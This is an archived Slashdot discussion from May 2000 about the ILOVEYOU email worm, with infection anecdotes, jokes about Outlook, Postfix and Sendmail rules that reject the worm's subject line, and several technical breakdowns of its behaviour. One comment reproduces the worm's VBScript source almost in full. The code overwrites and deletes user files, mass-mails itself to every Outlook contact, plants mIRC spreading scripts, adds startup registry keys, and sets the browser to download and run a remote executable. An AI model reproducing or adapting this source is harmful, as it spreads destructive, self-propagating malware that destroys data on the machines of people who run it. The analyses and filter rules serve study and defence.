Forgot your password?
typodupeerror
Spam

I Love You "Virus" Hates Everyone 519

Posted by CmdrTaco
from the just-when-the-last-rash-cleared-up dept.
Loquis was the first of seven billion readers to submit this story about the I Love You Virus and the UK. Its not really a virus: its a trojan that proclaims its love for the recipient and requests that you open its attachment. On a first date even! It then loves you so much that it sends copies of itself to everyone in your addressbook (slut!) and starts destorying files on your drive. Course they estimate that it's infected 10% of the UK. Pine/Elm/Mutt users as always laugh maniacally as the trojan shuffles countless wasted packets over saturated backbones filling overworked SMTP servers everywhere. Sysadmins are seen weeping in the alleys. Update: 05/04 03:12 by CT : My Roommate Kurt "The Pope" DeMaagd has written a better summary of the trojan and more importantly a HOWTO fix it. Windows users only ;) Requires registry hacking, so its not for everyone.
This discussion has been archived. No new comments can be posted.

I Love You "Virus" Hates Everyone

Comments Filter:
  • by Shadowlion (18254) on Thursday May 04, 2000 @04:49AM (#1092558) Homepage
    I have Outlook 2000 open as we speak.

    So far, I've received (estimated) about fifty copies of the damn thing. It's funny, in a "well, hey, look - a train wreck" sort of way.

  • by BrianW (180468) on Thursday May 04, 2000 @04:49AM (#1092562)
    But the number of "If you get an email that says 'I love you', DON'T OPEN IT!" messages are getting a bit annoying.
  • by xianzombie (123633) on Thursday May 04, 2000 @04:51AM (#1092567)

    As far as i know, the virus started out in Asia (somewhere) and made its way to Europe and now the US (Including many millitary installations as well).

    Sites I've found that offer disenfectants are a post on ZDNet http://www.zdnet.com/tlkbck/comment/22/0,7056,8875 4-421758,00.html, as well as http://www.f-source.com

    good luck people

  • On the other hand, I'm personally not stupid enough to open an attachment like this (especially with the obvious tagline of "LOVE-LETTER-FOR-YOU.TXT.vbs" - gee, you think that's a Visual Basic script?).

    I should really be compiling a list of the coworkers I'm receiving this from. It always pays to know where stupidity is in the org chart.

  • by jaf (121858) on Thursday May 04, 2000 @04:52AM (#1092571) Journal
    Our company was just hit by this - one NT server and two workstations down.. it deletes and renames files like there's no tomorrow.

    UNIX would not have a problem here..

    Maybe in the long run though - but at least a virus would "only" be able to do what the user can do - not nuke the system.

    People still have to be dumb enough to open the attachment.
  • by peterdaly (123554) <petedaly@ix.netc o m . com> on Thursday May 04, 2000 @04:52AM (#1092572)
    The nice thing about virus's like this is you find out about people you never met who have you in their address book....at least in my case. -Pete
  • by deasmi (97040) on Thursday May 04, 2000 @04:53AM (#1092575)
    The first two lines of the script are quite ammusing.
    rem barok -loveletter(vbe) rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
    I do hope that's not his real address....
  • by smartin (942) on Thursday May 04, 2000 @04:54AM (#1092577)
    This is the second time in a couple of months that I've been at a company where this sort of thing has gone around and around. Companys really need to be aware of the consequences of using Outlook and Exchange. This does not happen when you are using Sendmail and a regular POP3 or IMAP client.
  • Now I have to tell my girlfriend to delete all my old e-mails, because they had that subject line, and you never know!
  • by akey (29718) on Thursday May 04, 2000 @04:54AM (#1092579)
    OK - I suppose it's wishful thinking to hope that users would realize by now not to open e-mail attachments they know nothing about...

    Personally, I loved the quote from the journalist who said that she was suspicious when she received 5 copies of it, but since the last one was from Dow Jones, she opened it anyway... :-)

    ---
  • by njr (115982) on Thursday May 04, 2000 @04:54AM (#1092581)
    If not active in /etc/postfix/main.cf uncomment the line and change it to a line similar to:

    header_checks = regexp:/etc/postfix/header_checks

    Add the following line in /etc/postfix/header_checks:

    /^Subject: ILOVEYOU/ REJECT

    This will reject mails containing this subject.

    Thanks to Claus Guttesen who posted this on the postfix mailling list.

  • It's a very nasty trojan, especially because it starts automatically after a reboot. To be sure what is does and doesn't, look at: ftp://weazel.student.utwente.nl/pub/mailworm.txt
  • I never saw Melissa, but I did get three copies of ILOVEYOU thanks to the corporate-wide mailing list. That was this morning. Since then, our mailadmins have done an admirable job, and I've seen none. I'm glad somebody took Melissa as a wake-up call.
  • by scrutty (24640) on Thursday May 04, 2000 @04:57AM (#1092592) Homepage
    We got hit in our office this morning. Obviously the techs like me were running Linux and laughed it off. But unlike Melissa this one actually carries a nasty payload.

    It mails to everyone in your Outlook addressbook, not just 50. Also your MIRC nick list. It trawls all your mounted directories copying itself over all MP3's JPEGS .jpgs, style sheets and .js files amongst others

    This actually managed to knock out half of our office , as well as render one of our live web servers pretty messed up , within under 10 minutes of the first person activating it. Yes, the webserver was a linux box, but one unfortunate had a subtree on a server that mirrored stuff to it mounted over a samba share

    And no, you didn't have to click on it. That damn preview pane was enough to trigger it off.

  • Perhaps we should go back to the days of simple e-mail clients, that would make a virus like this look around, get confused, and then fall over.

    Either that, or people need to stop using the address books, which are for lusers anyway! :o)


  • My job's sysadmin has already warned us that the virus was in the wild somewhere, and has asked us *not* to open anything suspicious.

    I know that several large firms in my area are also scrambling to stop the infection. This virus can stop any MS system dead in its tracks and clog the others beyond repair. Tough little one!
  • From my initial investigation it looks like it is totally MS Specific. So own up then how many /. readers have been kicked in the balls? Come out of the closet all of you!
  • by FascDot Killed My Pr (24021) on Thursday May 04, 2000 @04:59AM (#1092601)
    This virus follows the same pattern of "send to everyone in the address book", but ALSO appends the senders name to a data file included with the virus.

    The recipient then falls into one of three classes:

    1) Can't get/read virus.
    2) Can get/read virus and gets stung (and appended to list).
    3) Can get/read virus, doesn't get stung, recieved handy list of idiot coworkers.

    This list can be used in a multitude of ways:

    1) Reduce headcount
    2) List of gullible fools who will buy $2 candy bars "to send the Girl Scouts to the Moon"
    3) Identify users who need "training" (sit in a small hot room with each other and an instructor who does nothing but taunt them for their hunt-n-pecking)

    --
    Have Exchange users? Want to run Linux? Can't afford OpenMail?
  • by Raymond Luxury Yacht (112037) on Thursday May 04, 2000 @04:59AM (#1092602) Homepage
    The only love letter I've ever gotten... and I can't open it....
  • by Anonymous Coward on Thursday May 04, 2000 @04:59AM (#1092603)
    Sorry - lost the /n's there

    It's a VBS worm. It spreads by two methods, irc and email.

    On startup it sets the registry key
    HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout
    to 0

    It then copies itself to WINNT/SYSTEM32/MSKernel32.vbs
    WINNT/Win32DLL.vbs
    WINNT/SYSTEM32/LOVE-LETTER-FOR-YOU.TXT

    It then creates registry keys

    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cu rrentVersion\Run\MSKernel32
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cu rrentVersion\RunServices\Win32DLL

    which will run the script again on the next boot of the computer

    Next it checks to see if ie download directory is set in the registry
    - if it is it remembers that value, otherwise it uses c:\ instead.

    It then checks to see it /WINNT/SYSTEM32/WInFAT32.exe exists - if it does
    it sets internet explorers start page to download a file called WIN-BUGSFIX.exe from one of 4 places (randomly chosen) on www.skyinet.net

    It then checks to see it this file has been downloaded (i.e. when the script is run at a later date). If it has to sets this .exe to be run at next boot and resets i.e home page to about:blank (blank page)

    Next, it generates the file WINNT/SYSTEM32/LOVE-LETTER-FOR-YOU.HTM
    This basically contains the worm itself set to run when the page is
    viewed.

    Now it does to old trick of openning the Outlook address book, grabbing
    *all* the entries in it and emailing then an email with the subject line "ILOVEYOU" and the worm as an attachment.

    Now it has a look around all the drives on the machine (local drives I think) as does the following
    a) If it find mirc, edits it's ini file so when you next log onto an
    irc channel it dcc's itself to all the other users
    b) Overwrites any .vbs and .vbe files it finds with itself
    c) If it finds any vbs, vbe, css,, wsh, sct or hta files it deletes them,
    creates a new file with the same name ending in vbs and copies itself to
    it
    d) Does similar things to (c) to .mp3, .mp2, .jpg, .jpeg

    Then the script ends

    Stuart
  • it's indifferent, if you use sendmail or exchange it depends on the os, if your os is capable of running vb crap, and you e-mail client is configured to run it, then you suffer, i can imagine pine running on window, with a mailcap entry for vbs files... but most nobody is that stupid.
  • rem barok -loveletter(vbe)
    rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
    On Error Resume Next
    dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d ow
    eq=""
    ctr=0
    Set fso = CreateObject("Scripting.FileSystemObject")
    set file = fso.OpenTextFile(WScript.ScriptFullname,1)
    vbscopy=file.ReadAll
    main()
    sub main()
    On Error Resume Next
    dim wscr,rr
    set wscr=CreateObject("WScript.Shell")
    rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Micr osoft\Windows Scripting Host\Settings\Timeout")
    if (rr>=1) then
    wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
    end if
    Set dirwin = fso.GetSpecialFolder(0)
    Set dirsystem = fso.GetSpecialFolder(1)
    Set dirtemp = fso.GetSpecialFolder(2)
    Set c = fso.GetFile(WScript.ScriptFullName)
    c.Copy(dirsystem&"\MSKernel32.vbs")
    c.Copy(dirwin&"\Win32DLL.vbs")
    c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
    regruns()
    html()
    spreadtoemail()
    listadriv()
    end sub
    sub regruns()
    On Error Resume Next
    Dim num,downread
    regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\MSKernel32",dirsystem&"\ MSKernel32.vbs"
    regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\RunServices\Win32DLL",dirwin &"\Win32DLL.vbs"
    downread=""
    downread=regget("HKEY_CURRENT_USER\Software\Micr osoft\Internet Explorer\Download Directory")
    if (downread="") then
    downread="c:\"
    end if
    if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
    Randomize
    num = Int((4 * Rnd) + 1)
    if num = 1 then
    regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhj kxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7 679njbvYT/WIN-BUGSFIX.exe"
    elseif num = 2 then
    regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfd jghKJnwetryDGFikjUIyqwerWe546786324hjk4j nHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
    elseif num = 3 then
    regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRp Gqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbv g/WIN-BUGSFIX.exe"
    elseif num = 4 then
    regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNB mnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPh jasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg /WIN-BUGSFIX.exe"
    end if
    end if
    if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
    regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\WIN-BUGSFIX",downread&"\ WIN-BUGSFIX.exe"
    regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
    end if
    end sub
    sub listadriv
    On Error Resume Next
    Dim d,dc,s
    Set dc = fso.Drives
    For Each d in dc
    If d.DriveType = 2 or d.DriveType=3 Then
    folderlist(d.path&"\")
    end if
    Next
    listadriv = s
    end sub
    sub infectfiles(folderspec)
    On Error Resume Next
    dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
    set f = fso.GetFolder(folderspec)
    set fc = f.Files
    for each f1 in fc
    ext=fso.GetExtensionName(f1.path)
    ext=lcase(ext)
    s=lcase(f1.name)
    if (ext="vbs") or (ext="vbe") then
    set ap=fso.OpenTextFile(f1.path,2,true)
    ap.write vbscopy
    ap.close
    elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
    set ap=fso.OpenTextFile(f1.path,2,true)
    ap.write vbscopy
    ap.close
    bname=fso.GetBaseName(f1.path)
    set cop=fso.GetFile(f1.path)
    cop.copy(folderspec&"\"&bname&".vbs")
    fso.DeleteFile(f1.path)
    elseif(ext="jpg") or (ext="jpeg") then
    set ap=fso.OpenTextFile(f1.path,2,true)
    ap.write vbscopy
    ap.close
    set cop=fso.GetFile(f1.path)
    cop.copy(f1.path&".vbs")
    fso.DeleteFile(f1.path)
    elseif(ext="mp3") or (ext="mp2") then
    set mp3=fso.CreateTextFile(f1.path&".vbs")
    mp3.write vbscopy
    mp3.close
    set att=fso.GetFile(f1.path)
    att.attributes=att.attributes+2
    end if
    if (eqfolderspec) then
    if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then
    set scriptini=fso.CreateTextFile(folderspec&"\script.i ni")
    scriptini.WriteLine "[script]"
    scriptini.WriteLine ";mIRC Script"
    scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will"
    scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"
    scriptini.WriteLine ";"
    scriptini.WriteLine ";Khaled Mardam-Bey"
    scriptini.WriteLine ";http://www.mirc.com"
    scriptini.WriteLine ";"
    scriptini.WriteLine "n0=on 1:JOIN:#:{"
    scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
    scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
    scriptini.WriteLine "n3=}"
    scriptini.close
    eq=folderspec
    end if
    end if
    next
    end sub
    sub folderlist(folderspec)
    On Error Resume Next
    dim f,f1,sf
    set f = fso.GetFolder(folderspec)
    set sf = f.SubFolders
    for each f1 in sf
    infectfiles(f1.path)
    folderlist(f1.path)
    next
    end sub
    sub regcreate(regkey,regvalue)
    Set regedit = CreateObject("WScript.Shell")
    regedit.RegWrite regkey,regvalue
    end sub
    function regget(value)
    Set regedit = CreateObject("WScript.Shell")
    regget=regedit.RegRead(value)
    end function
    function fileexist(filespec)
    On Error Resume Next
    dim msg
    if (fso.FileExists(filespec)) Then
    msg = 0
    else
    msg = 1
    end if
    fileexist = msg
    end function
    function folderexist(folderspec)
    On Error Resume Next
    dim msg
    if (fso.GetFolderExists(folderspec)) then
    msg = 0
    else
    msg = 1
    end if
    fileexist = msg
    end function
    sub spreadtoemail()
    On Error Resume Next
    dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,rega d
    set regedit=CreateObject("WScript.Shell")
    set out=WScript.CreateObject("Outlook.Application")
    set mapi=out.GetNameSpace("MAPI")
    for ctrlists=1 to mapi.AddressLists.Count
    set a=mapi.AddressLists(ctrlists)
    x=1
    regv=regedit.RegRead("HKEY_CURRENT_USER\Software \Microsoft\WAB\"&a)
    if (regv="") then
    regv=1
    end if
    if (int(a.AddressEntries.Count)>int(regv)) then
    for ctrentries=1 to a.AddressEntries.Count
    malead=a.AddressEntries(x)
    regad=""
    regad=regedit.RegRead("HKEY_CURRENT_USER\Softwar e\Microsoft\WAB\"&malead)
    if (regad="") then
    set male=out.CreateItem(0)
    male.Recipients.Add(malead)
    male.Subject = "ILOVEYOU"
    male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
    male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR -YOU.TXT.vbs")
    male.Send
    regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead ,1,"REG_DWORD"
    end if
    x=x+1
    next
    regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.Ad dressEntries.Count
    else
    regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.Ad dressEntries.Count
    end if
    next
    Set out=Nothing
    Set mapi=Nothing
    end sub
    sub html
    On Error Resume Next
    dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
    dta1="LOVELETTER - HTML"&vbcrlf& _
    ""&vbcrlf& _
    ""&vbcrlf& _
    ""&vbcrlf& _
    "

    This HTML file need ActiveX Control

    To Enable to read this HTML file
    - Please press #-#YES#-# button to Enable ActiveX"&vbcrlf& _
    "----------z--------------------z---------- "&vbcrlf& _
    ""&vbcrlf& _
    ""&vbcrlf& _
    ""&vbcrlf& _
    ""&vbcrlf& _
    ""&vbcrlf& _
    ""&vbcrlf& _
    ""
    dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
    dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
    dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
    dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
    dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
    dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
    dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
    dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
    set fso=CreateObject("Scripting.FileSystemObject")
    set c=fso.OpenTextFile(WScript.ScriptFullName,1)
    lines=Split(c.ReadAll,vbcrlf)
    l1=ubound(lines)
    for n=0 to ubound(lines)
    lines(n)=replace(lines(n),"'",chr(91)+chr(45)+ch r(91))
    lines(n)=replace(lines(n),"""",chr(93)+chr(45)+c hr(93))
    lines(n)=replace(lines(n),"\",chr(37)+chr(45)+ch r(37))
    if (l1=n) then
    lines(n)=chr(34)+lines(n)+chr(34)
    else
    lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
    end if
    next
    set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-Y OU.HTM")
    b.close
    set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU .HTM",2)
    d.write dt5
    d.write join(lines,vbcrlf)
    d.write vbcrlf
    d.write dt6
    d.close
    end sub

  • > Pine/Elm/Mutt users as always laugh maniacally
    Stop being so arrogant. It's just an executable attachment.

    For a linux version just write a bash script that'll read the users address book and send it on aswell.

    This is one reason NOT to want world domination. In that case it'll spread easily

    ------------------------------------------------ -
    "If I can shoot rabbits then I can shoot fascists" -

  • OK - I suppose it's wishful thinking to hope that users would realize by now not to open e-mail attachments they know nothing about...

    As I understand it (second hand), if the mail shows up in a preview pane in Outlook Express, then the script runs without user intervention.

    Now *that* is crappy design...
    --
  • by Sargent1 (124354) on Thursday May 04, 2000 @05:04AM (#1092621)
    Early this morning, in response to the virus, the AP had the following report about Microsoft:

    --

    SEATTLE (AP) -- In response to the "ILOVEYOU" virus, Microsoft has announced that they are changing the name of their popular e-mail program to "Microsoft Lookout!"

    "Really, what else could we do?" said Steve Ballmer, president of Microsoft. "I mean, first the Melissa virus, and then this. Sure, we probably should plug these security holes in Outlook -- whoops, make that Lookout! -- but we felt the name change was the most proactive step we could take short of releasing better programs."

    "At least the virus didn't say 'BILLGATESLOVEYOU'," he added. "Geez, that could've been bad."

    --

    Sargent
  • by otmar (32000) on Thursday May 04, 2000 @05:04AM (#1092622) Homepage
    Sendmail can filter that crap as well, just add

    HSubject: $>local_check_header_subject
    D{loveletterMessage}"553 Your message may contain a worm."
    Slocal_check_header_subject
    RILOVEYOU $#error $: ${loveletterMessage}

    to your sendmail.cf (version > 8.9 !).

    (there is a tab between the ILOVEYOU and $#error.)

    /ol (credits go to a cow-orker, though)
  • The problem isn't just that email is too versatile, but that people are too damned stupid. I could send a malicious linux binary via "mutt", and some idiot somewhere would be stupid enough to execute it.
    --
    A "freaking free-loading Canadian" stealing jobs from good honest hard working Americans since 1997.
  • What a treat. Is it just me or are viruses that affect e-mail seen as so much scarier since the user gets to see something, as opposed to other viruses that do damage and don't announce themselves.

    I think it's seen as being an easy way evil hackers can get at your machine, especially as people (and the media) don't seem to realise that the user has to open the email - it doesn't happen automatically. And, as an automatic it-comes-from-cyberspace-to-take-over-your-machine virus sounds sufficiently scary, it gets lots of media coverage.
  • by ToLu the Happy Furby (63586) on Thursday May 04, 2000 @05:06AM (#1092628)
    From the MSNBC article [msnbc.com]:

    "It crashed all the computers," said Daphne Ghesquiere, a Dow Jones spokeswoman in Hong Kong. "You get the message and the topic says ILOVEYOU, and I was among the stupid ones to open it. I got about five at one time and I was suspicious, but one was from Dow Jones Newswires, so I opened it."

    Once the message was opened, Ghesquiere said, it began sending the virus to other e-mail addresses within the Dow Jones computers, blocking people's ability to send and receive e-mail. Victims sometimes received dozens of e-mails, all contaminated.

    "I have no idea how it got through the firewall," Ghesquiere said. "It's supposed to be protected."
    (emphasis mine)

    The acticle even has a screen shot of the oh-so-unsuspicious attachment: "LOVE-LETTER-FOR-YOU.TXT.vbs".

    Now, I'm generally all for grandmothers sending email and not-everyone-should-have-to-be-able-to-configure-X 11-to-use-the-Internet and all of that, but shouldn't there be a law against letting people this ignorant operate important computers in financial institutions??

    I mean, I'm joking of course.

    Or at least I think I'm joking...
  • A lot of users will just see LOVE-LETTER-FOR... especially in outlook. For me - it was the icon that gave it away.
  • My office got it this morning.
    Of course the "IT staff" referred to it as a "hacker attack" *sigh* Without fail I look in my inbox every time these e-mail "viruses" hit and I'm disappointed with the # of cow-workers whom I communicate with who seemed fairly intelligent to me, up until this very point.
  • The guy put his email at the top of the virust

    rem barok -loveletter(vbe)
    rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines

    The Cure of the ills of Democracy is more Democracy.

  • I received a copy, but our sysadmins have a virus filter built in to the mail server, so the attachment was purged.

    That should be the standard approach at any site that runs Windows.
  • Not true.

    The file is an ATTACHMENT. In order for it to run, the user has to doubleclick it. It would be like sending a unix user a perl script that had rm -rf ~/* in it.

    Of course, your typical unix user probably wouldnt run such a file, but that isnt an application design issue.
  • Sendmail is an MTA, not an MUA. I don't see how Sendmail (or any of the better mailers like postfix or qmail) would ever have this problem.

    --
  • So let me get this right, Microsoft directly e-mails the virus to you, then goes over to your computer and forcibly opens the attachment? Wow! In that case, can they come over and cook me dinner while they're at it? I'd like roast linux fool, medium rare.
  • I think we need to see some responsibility on M$'s part to add some checks and balances to their open ended VB scripted Outlook. While we too got his by a Melissa like virus last month the Unix group just chuckled as the windows chickens ran about trying to stop the fire from spreading, or sending more spam by trying to tell people to not check it.

    Curiously, can we file suit if one of these things gets really nasty? The last one that hit us just sent the person to a p0rn site and everyone in their addr book, reg keys, desktop, startup. What if this had been a formating virii? Talk about large scale data loss.

    -Malachi-

  • > Stop being so arrogant. It's just an executable
    > attachment.

    Er, yes, but Pine/Elm/Mutt etc, do not run attachments automatically, don't include a programming language within the application itself, and aren't really susceptable to this sort of thing.

    Go ahead. Write a bash script. But you would have to be a COMPLETE idiot to run an unknown shell script, or any unknown application, recieved in e-mail. You certainly wouldn't get this kind of instant mass destruction.

    jf
    (Laughing manically!)

  • Sure I do. I just get the benefit of choosing which calendar I want to use. These things should all be standards based.
  • Our company IT head sent out a Melissa warning at 12am one day. 3am rolled around and I had 3 copies of it already, two from the same person.
    Ahh, the joys of Eudora on a Mac. I just sat back and laughed.

    Pope

    Freedom is Slavery! Ignorance is Strength! Monopolies offer Choice!
  • by TomV (138637) on Thursday May 04, 2000 @05:17AM (#1092660)
    first up, I don't like the guy's coding style one bit :)

    So what is it and what does it do?

    It's a VBScript file using the Windows Script Host runtime (wscript.exe), which is on any W98 or W2k systems, plus those with IE4 or higher (plus several other products install it).

    It propagates using OLE Automation against Outlook (any version), propagating both to Lists and individual addresses (internal function spreadtoemail()

    It dicks with the registry to make one of four URL's at skyinet.net ending in /WIN-BUGFIX.exe into IE's start page (IE only as it uses IE's registry entries to do this).

    Replaces any file of types vbs, vbe, js, jse, css, wsh, sct, hta, jpg, jpeg, mp2, mp3 with a copy of itself.

    Places copies of itself into \windows and \windows\system as win32DLL.vbs and MSkernel32.vbs and tweaks the registry so that these are loaded at startup

    builds a webpage and displays it, including a request for the user to disable ActiveX security.

    If you're non Win32 it's totally irrelevant. If you're Win32 but don't use Outlook it'll bugger about with some files but won't propagate. If you're Windows All The Way then it's trouble.

    Not only don't i like his coding style, but he doesn't even realize you can encode vbs files for obfuscation.

    It's hit 340 lists at our firm so far.

    TomV

  • This will work, it might delete some legit files but it's better then reinstalling. This thing doesn't appear to be THAT bad. Remain calm and do what the man says.

    does anybody know what the MS-BUGFIX.EXE file /does/ anyway?
  • by fooeyploo (150566) on Thursday May 04, 2000 @05:19AM (#1092664)
    I really think Microsoft has been getting a lot of things backwards. I think a more appropriate name for Outlook would have been Lookout!

    --
    Don't throw your computers out the windows. Throw the Windows out of
    your computers.
  • Many people in our company recieved the message, but because of the signs posted everywhere most of us around here didn't open the message. Right now I've got Outlook Express open and logged in to the exchange server through IMAP. I don't know how much that'll help, but I can always hope, can't I? Hell, at least I'm reading the really important email (stuff from my wife) through my ssh session with my server at home. I know Pine isn't susceptible to that shit.
  • since we use Outlook/Exchange for mail after migrating (partially) away from Novell and Groupwise...never mind that there's a large Mac presence at NIH, and the Mac client is way lame and not compatible with the Windows version (yet).

    Some of this was my employer's idea, as well. (The migration, not the virus.)

    Basically, even though 90% of the machines I support are not affected, everybody has to go without mail because they've turned off the Exchange server. I FUCKING FUCKING FUCKING hate Outlook!

  • ... you only hurt the ones you love!
  • by RubiCon (158847) on Thursday May 04, 2000 @05:23AM (#1092672) Homepage
    Okay, given a lot of the notices I've seen on this worm so far seem to be inaccurate, here's the rundown:

    Files created/edited:
    MSKernel32.vbs [created in System folder, copy of worm]
    Win32DLL.vbs [created in Windows folder, copy of worm]
    LOVE-LETTER-FOR-YOU.TXT.vbs [created in System folder, copy of worm]
    LOVE-LETTER-FOR-YOU.HTM [created in System folder, web page with worm embedded in it]
    WIN-BUGSFIX.exe [downloaded into default IE download folder]
    WinFAT32.exe [created in System folder by WIN-BUGSFIX32.exe, unknown purpose]
    *.vbs, *.vbe [overwritten with copy of worm]
    *.js, *.jse, *.css, *.wsh, *.sct, *.hta [deleted, replaced with copy of worm with name <filename>.vbs]
    *.jpg, *.jpeg [deleted, replaced with copy of worm with name <filename>.<ext>.vbs]
    *.mp3, *.mp2 [hidden attribute set, copy of worm with name <filename>.<ext>.vbs created]
    script.ini [if found in a directory with mIRC, overwritten with a script to output the HTML version of the worm to other users]

    Registry keys created/edited:
    HKLM\Software\Microsoft\Windows\CurrentVersion\Run \MSKernel32 [created to run MSKernel32.vbs]
    HKLM\Software\Microsoft\Windows\CurrentVersion\Run Services\Win32DLL [created to run Win32DLL.vbs]
    HKCU\Software\Microsoft\Internet Explorer\Main\Start Page [altered to attempt to download WIN-BUGSFIX.exe on browser startup]
    HKLM\Software\Microsoft\Windows\CurrentVersion\Run \WIN-BUGSFIX [created to run WIN-BUGSFIX.exe once downloaded]
    HKCU\Software\Microsoft\WAB\... [one entry per address book entry plus a running total used during email propagation]

    From all this you can work out the basic intention of the worm. It spreads via email propagation to everyone in your address book and by being sent via mIRC to other users. It maintains its hold on a machine by putting copies of itself in the Run and RunServices registry folders and by copying itself to files that look like existing files on the machine (presumably hoping the user has Hide Known File Extensions enabled).

    I'm not sure about the .exe it attempts to download (other than its marker) because all the traffic has taken the target server the file is held on (www.skyinet.net) down.

    Other info: the file orginates in Manila, Philippines according to comments in the worm, the email title it uses is 'ILOVEYOU' and the email text reads 'kindly check the attached LOVELETTER coming from me.'
  • Especially when they make you admin NT servers.

    I would imagine that a great number of the /. crew are stuck in the same position as I am, dictated to by corporate or institutional policy. It's not necessarily a matter of coming out of the closet, but of frowning, lowering your head and mumbling about the boss.
  • by Shoden (94398) on Thursday May 04, 2000 @05:27AM (#1092680)
    Just after that previous post, I went to delete those 16 messages from my deleted items folder... as soon as I selected the first message, the preview pane failed to appear. I immediately jumped to the task manager and saw "Virus - Running". I killed that and Outlook, which had stopped responding. As far as I can tell, nothing was sent, and none of my files were changed.
  • by Raindeer (104129) on Thursday May 04, 2000 @05:28AM (#1092681) Homepage Journal
    Alot of people here are going on about how bad it is that people still use MS-Outlook etc. And how bad it is that they open attachments they don't know of.. That all being as it may, I would like to point out, that the ability to be able to run scripts etc in mail is not nescessarily a bad thing, but that this has just been poorly implemented by MS.

    What I mean is this. I did my internship at a government agency which pays old age pension and child benefits in The Netherlands. They used alot of the VB possibilities you find in Office. The espescially build a very tight integration between their e-mail and the database that they have. Because they did this in this way, they were able to streamline the organisation in a great way. Alot of stuff could be streamlined through the organisation without the need for prints and reprints etc. Thankfully they had a security-officer that would refused to open up the network to the internet and decided to install one internet terminal per department. (I hope they still have that policy)

    What I meant to say was that in stead of laughing at all those people using MS-products and having problems with this VB-script, we should come up with a solution that is alot safer and gives companies the same ease of use of integrating it into their organisation.

  • At the risk of being flamed to a crisp:

    This is why if a company is going to use a large corporate email system they should choose Lotus Notes over exchange any day. While notes can run script on the opening of an email it has to be (unless someone is stupid enough to change the default settings) signed by a trusted sender. Atleast someone in your organisation who is an administrator.

    A virus such as this simply would not propagate between organisations with notes. At the worst it might screw up that organisations mail system, but if an admin really wanted to do damage their are much easier ways.

    Anyway just my $0.02.
  • Go ahead. Write a bash script. But you would have to be a COMPLETE idiot to run an unknown shell script, or any unknown application, recieved in e-mail. You certainly wouldn't get this kind of instant mass destruction.

    Need I remind you of all the email viruses that spread precisely because people were complete idiots, and ran unknown applications recieved in email. Take the HAPPY99.EXE virus, for example. My mother (admitted, a bit dim when it comes to computers) got this one, in spite of having been warned numerous times not to click on these things.

    --
    A "freaking free-loading Canadian" stealing jobs from good honest hard working Americans since 1997.
  • I think System Administrators should send a similar e-mail as this one every once in a while to all their users.
    An unharmfull version of it, that is, which only sends a reply back to the administrator. This way, he/she can warn the user for not ever opening anything he/she does know know of.

    Of course, the administrator will have to fake his e-mail addy, but that shouldn't be hard :)

    Just an idea... don't count on the web becoming virus-less... take countermeasurements.
  • This virus does, in fact, replicate in just the manner you suggest: "you would have to be a COMPLETE idiot to run an unknown shell script"

    That is EXACTLY what is happening. By default, Outlook will NOT run an attachment "automagically". It actually CANNOT be configured to run an attachment automatically, the user HAS to double click it.

  • Too bad MS didn't include antivirus with the OS instead of IE.
  • Those of us who use messenger are not immune to this as well

